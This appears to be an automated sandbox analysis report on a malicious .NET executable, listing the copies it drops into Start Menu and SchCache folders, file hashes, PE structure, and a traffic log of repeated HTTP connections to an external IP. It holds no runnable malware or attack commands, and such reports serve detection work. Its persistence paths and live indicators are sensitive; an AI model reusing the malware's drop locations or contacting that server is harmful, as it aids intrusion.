Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\2e26acd4fd0504

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with very long lines (488), with no line terminators
Category:	dropped
Size (bytes):	488
Entropy (8bit):	5.865943391675677
Encrypted:	false
SSDEEP:	12:XuzYx7KYJ/WXdAwfJEBCDeoE/xPkuOQzz7ZSiBxv:+zQKbXKwxNyn58uvcsv
MD5:	4E96C572413E6889EECDCECAECA3825A
SHA1:	F44186B1F50518C14918659AD427606C269678A8
SHA-256:	49C81E5207AE21A596A702473D2F00C3DA47D95EA75CC2FA48C45C046CC7DB2A
SHA-512:	9D43EF3A4D00DF72741C4422ADA69CB50636E6D86CD6122000BAE2FC82926CB547E5573FF5537FB9BA9206B6FA385A32891BF78629310E6AF880EEAE9219332C
Malicious:	false
Preview:	5Q5oKDMBQAVR2iD3RbWPw7uA7qe2rT4FEUUdovPxl8jqkaPAoD0cMrr8f4qdiUU7FQMhNjPgLioyYDahbeNndb3XmW7tEvPRollTNrwEyTQnC3kbeJCDGqeoXz41lfbaTXKwcGTurJyJLPUtwgP5tLL7H66Yw5cT20Upsx8XzRV72VcHeLFFQfqHLNpfJ48wqfQU4oA8h1FbzOEvey3k0XCXJNdfIcO5TjQWFINzKGiYZPR7I3BUBX6Tc2KqKe0EnKIQ7rqVlDatzo746gXOa346m74M7gppPdvPGAAaNqt76Mdy4QuoHmouQMo9xeYEYveV2sy5f7AuJ69ZdGRrwAhmyB84WBntSoiLsI5McyIKl3kTNOfrMqSYN1h1t3jeURcfYxrVKFP71XB4aprHg6glVK81kDciPo0UbF5ZhJgHbVgz0mbEMb8Xu0JNyzuHmqrMhqcUtRkWZZJAnJA8mYVxqcjl6rlrYZeunTRJ

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.15172744419513
Encrypted:	false
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
MD5:	13AEDA86AAFDE4051D7CA9280DAC9A67
SHA1:	FD4A6168C79C28D6E25BE7C799FFD25C2DBD69D0
SHA-256:	01EF75F76AE452476B1DE15A3238617F33C4B685E5BB423DE49F34F44B0A0111
SHA-512:	DDFC9A2A5A2F3B83023EECF4053DE1930EBF9486D1CFF869AB6D2199C5978926B2C4A6468358C627F4CFF16A235C8D23B98711D8B3BF608ED03F4E4D7D7D0194
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\SchCache\2e26acd4fd0504

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with very long lines (558), with no line terminators
Category:	dropped
Size (bytes):	558
Entropy (8bit):	5.832610003476292
Encrypted:	false
SSDEEP:	12:5Un5Pm9U+z0JvUEkhoBBtPKpLvPp5k/a42xPcqcu:5ePlHJvUEkhoBXO5k/wxkqcu
MD5:	B80A9A6BEB6D6638F91096F773F8724D
SHA1:	F35EAB432B89DF84372E10DF4AD25CF7BEBB62B7
SHA-256:	B6047EFDBF17B5A2784D13B9F4BA6B59B7F9EDEDD7B350DA5B2203CAAA2AA8BA
SHA-512:	5D0A9081B276EC167A9B6F61F29C00E035D6B58BD0985D2ACAC003DDC1412E3CE2F6004BDA3A5F90DF5A955842CDDD54A17BDF8A95E0636E1DF60E1B2223582C
Malicious:	false
Preview:	yRMjTrtYoNSmpgqKcHhuJovn8dMyCKn9xVGqHSnJBHJ5WJ54cBcRHDZJgjkzf4VdjSyTaADJdXtCfzQziRWBsW2u66JirxoGvqVEUleb8SxtUXoqTvRNiTvNaEXd0ecqtmQydMf7x5DZjIajRdP6gaib4InQNAkd0HArGzNHPTZmQVoRnxMXPfJSEy3UiPtxVkibIscbPIrNB5LjeVmayMNV7rmR62iAkmRqxMJ5UuHHy6QInU0MmT8IWNeaFLfXjrnYoevSMrFEEGgBadolCVXQnIUjsszJOuhHT2eIjiA5O4EPqc9lg4UNTWvgKMjd15zTiZri9fCdVbBsEE3PtNmUZTx6G78W8gETFurQvamB2112UCcGTUuoSf3OmucCgpfzWsnTXmeSllcib4mDf1DovaAj0coA7keMWCflZItq0bCqDVwrIZgpl0D6rEd47dUBGPMZZAoXIWyUXTffp61iDzkf8i4VoytWGBkyIXSHuIgOCtjXi8PAlv7Rorb0GStTnbNVtrWSouy4TWcO9gwpjsuUDTJb6bBbZMkkgNo0m6

C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.15172744419513
Encrypted:	false
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
MD5:	13AEDA86AAFDE4051D7CA9280DAC9A67
SHA1:	FD4A6168C79C28D6E25BE7C799FFD25C2DBD69D0
SHA-256:	01EF75F76AE452476B1DE15A3238617F33C4B685E5BB423DE49F34F44B0A0111
SHA-512:	DDFC9A2A5A2F3B83023EECF4053DE1930EBF9486D1CFF869AB6D2199C5978926B2C4A6468358C627F4CFF16A235C8D23B98711D8B3BF608ED03F4E4D7D7D0194
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.15172744419513
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	B9exXW7c3t.exe
File size:	1'433'600 bytes
MD5:	13aeda86aafde4051d7ca9280dac9a67
SHA1:	fd4a6168c79c28d6e25be7c799ffd25c2dbd69d0
SHA256:	01ef75f76ae452476b1de15a3238617f33c4b685e5bb423de49f34f44b0a0111
SHA512:	ddfc9a2a5a2f3b83023eecf4053de1930ebf9486d1cff869ab6d2199c5978926b2c4a6468358c627f4cff16a235c8d23b98711d8b3bf608ed03f4e4d7d7d0194
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
TLSH:	25657B027F44DE11F0091233C2FF494847B5A951AAA6E32B7DBA376E15123AB3C5D9CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x55c55e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62DD6184 [Sun Jul 24 15:13:08 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15c510	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x162000	0x31c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x164000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x15a564	0x15a600	85ad205d19fc891dbfd5d3d5751f9029	False	0.7100303647149043	data	7.181001669027784	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x15e000	0x2fdf	0x3000	b7b6850aa773c4e8c2570a2444d1a93e	False	0.3102213541666667	data	3.243030732013221	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x162000	0x31c	0x400	2eecc90815da3e124bb77b4e3e6670c1	False	0.361328125	data	2.641821731914665	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x164000	0xc	0x200	5f5b725781a5f5c0acecc5e487a32a4c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x162058	0x2c4	data	English	United States	0.4717514124293785

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 14:46:56.298827887 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:56.536550045 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.536783934 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:56.537117004 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:56.774739027 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.774808884 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775003910 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775043011 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775078058 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:56.775099039 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775139093 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775147915 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:56.775531054 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775569916 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775588989 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:56.775693893 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775732040 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.775789022 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:56.775852919 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:56.776041031 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.013087034 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.013158083 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.013197899 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.013228893 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.013237953 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.013345957 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.019288063 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.256975889 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.257025957 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.257288933 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.257330894 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.257390976 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.257570028 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.257610083 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.257672071 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.257728100 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.257767916 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.257822990 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.257972956 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.258013010 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.258028030 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.258275032 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.258315086 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.258383036 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.258477926 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.258516073 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.258570910 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.258709908 CEST	80	49705	82.146.61.164	192.168.2.5
Apr 23, 2024 14:46:57.258964062 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:57.270092010 CEST	49705	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:46:59.877230883 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.114206076 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.114336014 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.118371964 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.355230093 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.355285883 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.355442047 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.355483055 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.355519056 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.355606079 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.355643988 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.355669975 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.355850935 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.355890036 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.355907917 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.356000900 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.356040001 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.356055021 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.356079102 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.356132984 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.592432976 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.592449903 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.592521906 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.592546940 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.592560053 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.592609882 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.608383894 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.845386982 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.845458031 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.845624924 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.845676899 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.845686913 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.845765114 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.845805883 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.845819950 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.846081018 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.846118927 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.846132040 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.846282005 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.846318960 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.846334934 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.846493959 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.846529961 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.846561909 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.846776962 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.846813917 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.846832037 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.847027063 CEST	80	49706	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:00.847107887 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:00.857939959 CEST	49706	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.228765011 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.466067076 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.466979980 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.467160940 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.704370975 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.704560041 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.704819918 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.704864979 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.704869032 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.705056906 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.705096006 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.705101967 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.705517054 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.705554962 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.705555916 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.705792904 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.705831051 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.705836058 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.706087112 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.706129074 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.941955090 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.942017078 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.942054987 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.942090034 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:32.942181110 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.942181110 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:32.943299055 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:33.180246115 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.180308104 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.180473089 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.180511951 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.180522919 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:33.180674076 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.180711985 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.180717945 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:33.180953026 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.180994034 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:33.181008101 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.181159973 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.181196928 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.181202888 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:33.181318998 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.181361914 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:33.181406975 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.181598902 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.181637049 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.181641102 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:33.181849957 CEST	80	49714	82.146.61.164	192.168.2.5
Apr 23, 2024 14:47:33.181891918 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:33.183316946 CEST	49714	80	192.168.2.5	82.146.61.164
Apr 23, 2024 14:47:45.290559053 CEST	49715	80	192.168.2.5	82.146.61.164
